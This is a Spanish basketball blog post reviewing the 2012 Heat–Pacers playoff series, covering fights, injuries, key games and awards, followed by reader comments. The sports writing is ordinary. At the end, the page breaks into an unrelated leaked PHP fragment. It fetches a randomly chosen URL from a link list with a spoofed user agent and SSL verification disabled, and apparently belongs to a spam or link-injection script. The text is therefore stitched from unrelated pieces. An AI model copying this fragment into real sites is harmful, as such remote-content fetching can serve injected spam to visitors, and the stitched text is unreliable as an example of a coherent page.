Resumen Heat 4 – Pacers 2

26 de May de 2012 por Sancho88

Busquen en su botiquín del cuarto de baño. ¿Tienen tiritas? ¿No? Lógico, se las han llevado todas en esta eliminatoria. Como si fueran partidos de los 80 entre los Celtics y los Sixers, aquí se han repartido ‘leña’ por todos los costados, y el propio Larry Bird, como gallo ‘maximus’ del corral de Indianapolis, ha tenido que llamar a filas a sus pupilos, tan ‘blandos’ para él que seguramente haya estado al borde de hacer un ‘McHale’* con alguno de sus jugadores.

*Hacer un McHale (para los de la LOGSE): Dícese de las tácticas de intimidación psicológica que ejercía el líder del ‘greenpride’ de los 80 Larry Bird sobre su díscolo compañero de equipo.

Siendo claros: o te espabilas o te espabilan. Ese es el trabajo que tendrán que hacer estos jovenzuelos de los Pacers de ahora en adelante si quieren pelear algún día por el título de la Conferencia Este, y quién sabe si por el cetro de campeones. Deben madurar, en definitiva, y estos partidos les deberían servir muchísimo como aprendizaje para batallas venideras. No obstante, han plantado cara en la serie y daba la sensación de que podían forzar el séptimo perfectamente, pero nadie se explica cómo pudieron tirar a la basura todo el gran trabajo de los primeros partidos en el cuarto y quinto juego de la serie. Ahí pusieron las cosas mucho más accesibles para unos Miami Heat que se han comportado como el maestro duro de la escuela, apáticos en muchos momentos, rácanos con el juego, pero muy eficaces cuando debían serlo, y sobre todo con una lectura de los partidos muy buena a partir del cuarto partido, donde ajustaron la defensa e impidieron que los Pacers impusieran su superioridad en la pintura. En definitiva, han podido demostrar con bastante solvencia que los años saben más que la osadía de la juventud, y han conseguido un 4-2 final del cual hay muchas cosas que decir, pero todas se pueden resumir en tres palabras: niños contra hombres. Esto se debería equilibrar en próximas ediciones, pues no faltarán multitud de cuentas pendientes y frentes abiertos (que no se conviertan en frentes abiertas, esperemos).

Pero empecemos por el principio. Frank Vogel intentó calentar la serie en las jornadas previas, acusando a Lebron y cía. de sus actuaciones folklóricas dentro de la cancha en pos del pitido fácil del señor árbitro. Cuán lejos de resultar efectiva estuvo aquella táctica… Al final, los Heat jugaron mucho mejor con la pelota, no hubo favores arbitrales a excepción de la tipología cuestionable de las flagrantes tipo 1, y también fueron superiores en la batalla psicológica, es decir, en el metapartido* (para los de la LOGSE: lo que no se ve en el partido a primera vista). Lamentablemente para los defensores del ‘fair play’ (Metta World Peace, Bruce Bowen o Kevin Garnett), esta ha sido una eliminatoria marcada por las trifulcas callejeras dentro de la cancha. Como consecuencia, se han señalado casi 40 faltas por partido, 7 faltas técnicas, 4 faltas flagrantes y 2 eliminados: Udonis Haslem, quien podrá jugar desde el inicio la serie de las finales de conferencia, y Dexter Pittman, que no importa si no juega más al baloncesto. Estos han sido los antagonistas en los Heat. Por parte de los Pacers todos los ‘méritos’ los ha cosechado el señor Tyler Hansbrough (Pchycho-T), quien ya por su apodo (y por su mirada) despide aromas de perturbado. Sus ‘garras’ han puesto en serio peligro el suministro mundial de tiritas para cejas.

Los principales damnificados de esta sucia guerra fueron finalmente las cejas de Wade y Haslem (este dio y recibió a partes iguales), el brazo amoratado de Hansbrough (por espabilado) y la rodilla del pobre West, quien pensó que podía jugar sucio contra Lebron, y éste le devolvió una fuerza Ki de tales proporciones que acabó con su rodilla en el quinto juego. Ese percance fue sin querer, pero otra lesión provocada por el bueno de ‘King’ James, de las que se dicen que son sin querer queriendo, acabó con el tobillo de Granger también en el quinto partido. Y esa será la excusa de Granger ‘per secula seculorum’* (para los de la LOGSE: por los siglos de los siglos) para justificar su horrenda actuación durante la serie. Solamente ha anotado 13 puntos por partido, con unos porcentajes ridículos, que no llegan ni al 38% en tiros de campo.

No obstante, si alguien recordará estos partidos de Semifinales de Conferencia Este, ese será sin duda Lance Stephenson, un mediocre (por no llamarle Jay Larrañaga) jugador de baloncesto que se cruzó con el codo de un asesino disfrazado también de jugador de baloncesto llamado Pittman, el sumo pontífice del ‘blackout’. Su nuez y su garganta dan gracias a estas horas, porque el golpe es brutal, muy brutal, quizá, el más brutal de toda la temporada junto al que se llevó James Harden en el Staples por obra y gracia de ‘El idiota’. Stephenson también tuvo sus más y sus menos con el veterano y dudosamente cuerdo Juwan Howard, durante el calentamiento previo (nunca mejor dicho) del quinto partido. Un milagro que haya salido vivo de todo esto.

Hasta aquí la ración de casquería, que diría el bueno de Iñaki Cano Jr., y ahora el resumen puro y duro de los acontecimientos deportivos. La serie tuvo dos partes diferenciadas. La primera indicaba que los Pacers sabían cómo ganar a los Heat sin Bosh. Fueron tres partidos para soñar, donde los amarillos pusieron la eliminatoria a su favor con una gran defensa que dejó en 75 puntos a los Heat en dos partidos consecutivos. En el primero se habían impuesto los ‘Beach Boys’ con su trío de ases en un partido que quedó marcado por la lesión abdominal de Chris Bosh, pero los Pacers supieron reponerse a través de George Hill, quien encadenó dos grandes partidos, y sobre todo gracias al juego interior combinado de West y Roy Hibbert, quienes sumaron 40 puntos entre los dos en el tercer partido. Esa victoria ponía las cosas 1-2 en contra de los Heat, que además sufrían el ‘Mr. Hyde’ de Wade, pues solo sumó 5 puntos en ese partido y por si fuera poco se las tuvo ‘tiesas’ con su mister, Spoelstra. Muchos pensaron que los Heat no iban a recuperarse de aquel golpe.

Nada más lejos de la realidad. La reacción llegó para los de Florida en casa de los Pacers, y lo hizo precisamente gracias a un Wade resucitado, que fue capaz de anotar 22 puntos en la segunda mitad del cuarto partido (para un total de 30), y, como no, gracias al Lebron más abusón que hemos conocido. El alero de Ohio firmó unas estadísticas prodigiosas en ese partido con 40 puntos, 18 rebotes y 9 asistencias, algo que no ocurría desde 1961 con Elgin Baylor como protagonista. Ese partido cambió todo, pues devolvió el factor cancha a los Heat, Wade hizo las paces con Spoelstra y por fin encontraron un tercer escudero de la mano de Udonis Haslem, que anotó 14 puntos. A partir de ahí, las dos siguientes batallas ampliaron el abanico de escuderos sorprendentemente.

El quinto supuso también la mayor paliza recibida por los Pacers en toda su historia en los Playoffs. Perdieron de 32 puntos y la segunda mitad careció de todo interés debido a la lesión de Granger. Esa baja, unida a la de David West en el tercer cuarto, terminó de sentenciar un partido sin demasiada historia. Otra vez el dúo dinámico volvía a combinarse para anotar 60 puntos, y esta vez la tercera espada llevaba el nombre de Shane Battier, que anotó 4 triples y desquició a West hasta decir basta.

Con el 3-2 en contra, Indiana intentó empatar la serie en el sexto partido en casa, y ciertamente puso los cimientos para hacerlo, pero ya era demasiado tarde. Salieron envalentonados, encadenando un parcial inicial de 5-15. Parecía que volvíamos a ver unos Pacers mucho más peleones como en los tres primeros partidos, más agresivos en ataque, aprovechando mejor las esquinas y surtiendo a West en la primera mitad para conseguir buenas acciones, pero al final se toparon con el muro defensivo de los Heat y ya no supieron reaccionar. Muy bien la actitud de Joel Anthony y Shane Battier, no solo en este partido, sino en toda la serie, pues supieron sacar de la marca a sus pares y no dejarles recibir fácilmente. Asumieron su inferioridad en centímetros y decidieron molestar con su defensa por delante, lo cual creó muchos dolores de cabeza en el ataque de los Pacers, que no fueron superiores en el ataque estático y no pudieron correr en muchas ocasiones tampoco. Además, otro de los ‘tapados’ durante gran parte de la temporada, Mike Miller, emuló a Battier y se sumó a la fiesta con otros 4 triples en este último partido. El ‘extra pass’ de los Pacers, ese que tan bien les salía en la temporada regular, aquí fue contraproducente, pues cada nuevo pase era una nueva oportunidad para los Heat de robar el balón y salir corriendo.

Muchos puntos llegaron de esa manera en la eliminatoria, tras muchas pérdidas de los Pacers (que acumularon 15 por partido) y, sobre todo, con dos hombres castigando por encima del resto: Dwayne Wade y Lebron James. Ambos fueron el brazo ejecutor en esta eliminatoria, y sin ellos al mejor nivel probablemente de sus carreras (aunque Wade ya jugó así en las finales de 2006), esta serie habría sido muy diferente, con muchas más opciones de victoria para los Pacers.

Finalmente se impuso la suprema calidad individual de la gran pareja de los Heat, y los Pacers cayeron eliminados dando la sensación de agotamiento físico y mental, como si la presión de luchar contra los favoritos les hubiera pasado factura. Los Heat salen muy reforzados de esta eliminatoria, y con la sensación de poseer el mayor talento individual de los cuatro equipos que quedan en competición. Veremos si les vale para conseguir su objetivo, que no es otro que conseguir el anillo.

 PREMIOS

MVP: El MVP de esta eliminatoria debe ser compartido. Es imposible dárselo a Wade o a James, discriminando a uno de los dos, y por tanto, sería de justicia que Dwayne James, o Lebron Wade, como prefieran, sean los encargados de recoger el premio. Entre ambos se combinaron para anotar 56 puntos por noche, con porcentajes del 48% en tiros de campo, capturar 16 rebotes, repartir 10 asistencias, robar 4 balones y poner 2 tapones por partido. El jugador total nacería de una fusión entre ambos, porque ambos han estado excelsos.

Sorpresa: Nadie esperaba nada de jugadores como Joel Anthony, Shane Battier, Udonis Haslem o Mike Miller a estas alturas. No obstante, cada uno contribuyó a su manera en las últimas tres victorias de los Heat, y aunque sus estadísticas no les dejan en muy buen lugar en el cómputo global de la eliminatoria, han demostrado que en momentos puntuales pueden aportar grandes cosas al equipo.

Decepción: La pareja líder de estos Pacers, teóricamente, formada por Danny Granger y Roy Hibbert no ha estado a la altura de la eliminatoria. Granger firmó 13 pírricos puntos, cuando se suponía que era la única baza de los Pacers que podía aportar más de 20, y Hibbert no se ha ganado ese contrato multimillonario que todos esperábamos. Al menos, no en la cancha. 12 puntos, 11 rebotes y 2,5 tapones no son números de mega estrella. Se le presumen grandísimas cualidades, pero de momento no las ha explotado. No tuvo malos porcentajes de tiro, pero no se involucró demasiado contra unos pívots rivales del calibre de Anthony o Ronny Turiaf. Ha tenido una actuación digna en defensa, pero en ataque se ha mostrado bastante inofensivo. No ha logrado imponer en ningún momento su teórica superioridad, y solo en el tercer partido mostró su verdadero potencial, o al menos, el que creemos que puede ofrecernos, al anotar 19 puntos y coger 18 rebotes. En el último partido Wade y Lebron se ‘picaron’ por ver quién metía la mejor canasta sobre el grandullón. Estaba tan agotado que no podía ni levantar los brazos. Necesita descansar este verano y evolucionar físicamente. Nadie duda de que lo conseguirá, pero aún no es una realidad, aunque sí un proyecto muy serio de gran figura.

Esfuerzo en vano: Con este panorama, solo David West se puso el mono de faena realmente. No logró sobreponerse a la defensa asfixiante de Battier en los últimos tres partidos, pero al menos lo intentó y aportó bastantes cosas a su equipo. 15 puntos y 8 7 rebotes, que si bien están lejos de ser los números de un líder, al menos son bastante dignos teniendo en cuenta que él debería tener un papel secundario por detrás de Granger y Hibbert. Dio la cara y fue una amenaza real para la pintura de los Heat. Eso sí, una amenaza insuficiente.

Comenta

11 comentarios a esta entrada

  1. nba dice:
    #1

    Esperemos que por el bien del Este Bird haga cambios, ya que si no va a ser un paseo militar para Heat,
    con Celtics en decadencia, con los Bulls tocados, con Orlando sin rumbo fijo, con los Knicks vete a saber que …, hay que aferrarse a estos Pacers a ver si son capaces de crecer y consiguen al menos una solidez en el futuro como los Grizzlies en el Oeste.

      Citar

  2. Sancho88 dice:
    #2

    Un matiz, me he equivocado con los rebotes de West. Fueron 8 por partido, no 7. Algunos apuntariais seguro mayor esfuerzo en vano para Hibbert…. pero no, para mí ha sido mucho más grande la decepción que me ha causado al no saber sacar provecho de los pívots de Miami, que sus buenos rebotes, porcentajes, eficiencia… su impacto real ha sido menor al de West, y de ahí que dé ese premio a West. Y ojo, si le pongo en decepción es porque yo pienso que podemos esperar muchísimo más de él por sus cualidades. Lo tiene todo para ser un center de muchos kilates. Lo de Granger sí que es una ruina de eliminatoria…

      Citar

  3. Txusma dice:
    #3

    Perdona Sancho. No había visto el segundo mail que me enviaste. Lo corrijo ahora mismo.

      Citar

  4. Ru dice:
    #4

    Recordando uno de esos “Reflexiones sobre la bocina”. Potencial:cualidad que se atribuye a todo aquel jugador que es malo pero joven. Es que se me ha venido a la cabeza al mencionar a Lance Stephenson en el artículo(por cierto,estilo inconfundidible el de Sancho)).De este tio recuerdo haber leído en un “profile” que lo llamaban “Born Ready” y que era la leche en el instituto pero que se lo tenía creido llegando a protagonizar enfrentamientos con sus entrenadores…y por eso se ha pegado la hostia.

    Sobre los Pacers debe ser fundamental que trabajen con Roy Hibbert a conciencia.No sé si la ética de trabajo va en el pack pero puede llegar a ser dominante,tanto como los 10 millones mínimo que se va a pedir este verano.Así que chaval,aplícate y ten un poco de mala leche.

    En la lista de “Guards” tienen a Collison y a Hill,que si no se desculega en su renovación es interesante como 6º hombre.Aún así les falta un verdadero PG y unido al hipotético desarrollo de Hibbert sólo me viene un nombre a la cabeza:Steve Nash.Si este tio es capaz de hacer que sus compañeros de Phoenix mejoren sus promedios anotadores,que hará en los Pacers. Leandrinho no tiene hueco en este equipo ya que contaría con Dahntay Jones(PO por 2.5 K) y con el susodicho Stephenson,que como rotación es baratito. Y la perra gorda es para el traspaso de Granger por un escolta. El nombre de Eric Gordon sale en todas las apuestas.

    Paul George definido ya como SF,compartiría quinteto con West,con Hansbrough y porque no un renovado Amundson,si no se sube a la parra porque es bastante limitado.Pueden usar su elección de primera ronda para hacerse con un Quincy Miller o un alero del corte,si no por un pívot como Fab Melo si les llega a su elección.

    Parece que no pero a priori es uno de los equipos que más trabajo van a tener este verano,sobre todo por esa capacidad salarial con la que cuentan y que les puede permitir aascender ese escalón que todo el mundo espera de ellos.

      Citar

  5. Ru dice:
    #5

    Por cierto Paniagua ha dicho que Lowry parece que no se siente atraído por la idea de la renovación de Dragic en los Rockets.¿Deja vu con Pau?

      Citar

  6. Nacho dice:
    #6

    Pues viendo los últimos partidos de la serie, con LeBron y Wade a ese nivel, la defensa asfixiante del equipo, y la aparición cada día de un secundario, dudo que este equipo necesita a alguien en la pintura (aparte de recuperar a Bosh, con su consabida alergia a la bombilla [para los de la LOGSE: invento de un tal Edisson para iluminar a los hombres altos del baloncesto]).
    Creo que un interno fuerte, de peso ofensivo, restaría más que sumaría a estos Heat.
    Realmente no tienen rival en el Este, salvo que los Celtics pierdan dos o tres años, y no parece que sus rodillas estén por la labor.
    La serie contra los Pacers se resume en la frase de Sancho, niños contra hombres, qué aunque suene dura, es la que más refleja lo sucedido.
    Se ha hablado mucho del fallo de los de Indiana de no meter balones dentro cuando avanza el partido, yo creo que es más por mérito de la defensa que por demérito de Hill, George y compañía.
    Deben aprender a morder estos Pacers, y sobre Miami no sé que decir, porque me es un equipo antipático, no puedo con LeBron, Wade cada día me cae peor, porque cada día me parece más gilipollas, no puedo con Bosh ya desde Toronto… pero, ¡qué buenos son los cabrones!, por poner un pero, creo que es el equipo al que menos pasos se le pitan de los que comete, y son los que más hacen…
    Sólo veo a los Spurs con posibilidades (hasta de barrerlos) si siguen con su dinámica, y pueden con OKC, pero de eso hablaremos, si sucede.

      Citar

  7. sayim dice:
    #7

    Sólo tengo una cosa que decir del artículo: F-E-L-I-C-I-D-A-D-E-S

    Cuanto ganó el blog con la incorporación de las nuevas generaciones, aunque vengan de la LOGSE…

      Citar

  8. HisRoyalAirness dice:
    #8

    Muy buen análisis Sancho! Aunque tengo que darte una colleja por comparar estas “escaramuzas” de niños con las series entre Sixers y Celtics (para los de la LOGSE, poner en youtube Dr. J fight Larry Bird).

    Está claro que Larry va a hacer cambios, yo vuelvo a pensar en Pau, ya que les hace falta una referencia anotadora All-Star.
    Con respecto a lo que decís de que en el Este no hay rival…ya dais por muertos a los verdes? Porque sí, KG tiene 30 y tantos tacos pero sin Bosh en la pintura les puede pintar la cara muy a gusto. Pero mucho. Hablo de los Celtics porque un 7º partido en el Garden es como jugar una final de Champions contra el Liverpool en Anfield, o sea una pesadilla; creo que los de Philly lo tienen crudo.

    Y ahora voy a decir una cosa para que quede constancia: si los Heat ganan el anillo el MVP de las FInales va a ser Dwayne. Ya veréis

      Citar

  9. nba dice:
    #9

    Hombre a los orgullosos verdes nadie los da por muertos, pero evidentemente con la plantilla actual su rendimiento en principio va a bajar en las proximas temporadas, ademas hay que contar que hay varios equipos top del Este a los que se les han complicado sobremanera las cosas y de los cuales esperabamos mas Bulls-Orlando , dependiendo que quien gane la NBA , de los cambios en la noche del draft y las Olimpiadas , creo yo determinaran las posibilidades de estos, ya que hacer cabalas a estas altura de la temporada no tiene sentido.

    Respecto a Pau, cualquier destino salvo Toronto, me parecería razonable, lo que esta claro es que los Lakers y sobre todo Kobe deberan bajarse del burro y no pretender conseguir lo que no les van a ofrecer por Pau.

      Citar

  10. Esteban dice:
    #10

    buen articulo sancho!!!

      Citar

  11. GreenPride dice:
    #11

    Bueno una serie que ha dado para hablar mucho de ella. La lesión de Bosh en el primer partido la puso mucho más interesante de lo que se podía suponer y luego el juego de los Pacers en los tres primeros partidos (y la mitad del cuarto no olvidemos) parecía invitar a la gran sorpresa y una nueva decepción de “El Elegido”. Sin embargo, ahí cambió todo.
    Estoy de acuerdo en lo de “niños contra hombres”, cuando LeBron se echó el equipo a la espalda y le acompaño Wade, los Pacers fueron incapaces de hacer valer sus armas para ganar la serie que las tenían. Su superioridad interior se diluyó ante la agresiva defensa de los Heat (muy bien Battier y Anthony defendiendo por delante) y la incapacidad de los exteriores de Indiana de encontrar líneas de pase para sus interiores. Hibbert que fué decisivo en el tercero nunca volvió a encontrar esa importancia en el juego y los exteriores acabaron desapareciendo, comidos por Batman y Robin (para los de LOGSE LeBron&Wade) e incluso muchas veces por Chalmers. Los triples empezaron a entrar para los Heat y hasta Haslem aportó en ataque y la serie se fue haciendo cada vez más cuesta abajo para los de Miami.
    Aquí hacer mención especial a la primera mitad del 4º partido para mí la clave de la serie. Ahí el señor James se echó el equipo a la espalda y mantuvo unas diferencias recuperables casi él sólo en para mí su mejor actuación que le haya visto hasta hoy. Luego ya se sabe, un desaparecido Wade hasta ese momento resucitó y se unió a él provocando un verdadero festival entre los dos. Aquí la defensa Pacer se equivocó o no pudo con las penetraciones de ambos, deberían haberse cerrado muchísimo más intentando que ambos se dedicasen a tirar tiros lejanos pero no pudieron o no supieron hacerlo. La serie ha retratado a los exteriores de Indiana y sobre todo a Granger, buen jugador sí pero no para atarle las botas a los grandes de verdad en su posición. Para mí es un segundo o tercer espada de un equipo aspirante, no más. Paul George ni eso, un gran defensor con muchas lagunas en ataque. George Hill empezó muy bien y ha acabado calamitoso, creo que Collison debería haberle comido muchos más minutos en esta serie.
    Ahora queda la sensación que creo real de que a Indiana le hace falta todavía una o dos piezas de calidad para poder aspirar al anillo. Seguro que el gran pájaro habrá tomado nota (¡Que grande llamándoles blandos tras el 5º!). Yo buscaría un traspaso de Granger por un 2 de verdadera calidad, en principio me vale Eric Gordon aunque no está probado en PO por lo que podría que al final no resultara. También necesitan un primer base en condiciones (Nash les vendría al pelo pero le queda poca gasolina). Si el espacio salarial les da yo me tiraría con todo a por Deron Williams que sí les podría dar un gran salto de calidad aprovechando para sacar tajada mientras con Hill o Collison. Tienen espacio salarial aunque sabemos que Larry Legend se mueve con mucha prudencia y que tienen que afrontar la renovación de Hibbert. Ese sería otro de los puntos claros de mejora, conseguir que Roy Hibbert mejore sus condiciones físicas y sea ese center dominador que apuntan sus condiciones y que hoy día no es.
    Por los Heat, todo hace indicar que van encaminados a dominar el Este en las próximas temporadas, casi hasta con facilidad dependiendo sobre todo de lo que pase con Chicago y con Derrick Rose. Si éste se recupera bien y los Bulls consiguen un interior anotador de verdad (como les vendría Pau a estos) entonces sí que podrían ser un equipo aspirante a desbancarlos. Pero de momento habrá que ver si consiguen el anillo este año. Los Celtics son su siguiente piedra aunque la verdad da pena cómo llegan los verdes… pero eso ya lo veremos en su momento

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>